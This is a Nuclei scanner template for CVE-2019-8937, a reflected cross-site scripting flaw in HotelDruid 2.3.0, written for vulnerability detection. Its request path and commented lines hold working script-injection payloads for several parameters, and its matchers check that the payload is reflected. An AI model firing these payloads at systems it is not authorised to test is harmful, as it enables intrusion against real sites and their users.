nuclei-templates/cves/2019/CVE-2019-8937.yaml

47 lines
2.1 KiB
YAML

id: CVE-2019-8937
info:
name: HotelDruid 2.3.0 - XSS
author: LogicalHunter
severity: medium
description: HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
reference:
- https://www.exploit-db.com/exploits/46429
- https://www.exploit-db.com/exploits/46429/
- https://sourceforge.net/projects/hoteldruid/
- http://packetstormsecurity.com/files/151779/HotelDruid-2.3-Cross-Site-Scripting.html
metadata:
verified: true
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-8937
cwe-id: CWE-79
tags: cve,cve2019,xss,hoteldruid
requests:
- method: GET
path:
- '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
# - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x"><script>alert(document.domain)</script>'
# - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13"><script>alert(document.domain)</script>'
# - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php"><script>alert(document.domain)</script>'
# - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019"><script>alert(document.domain)</script>'
# - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
words:
- '"</script><script>alert(document.domain)</script>"><input'
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200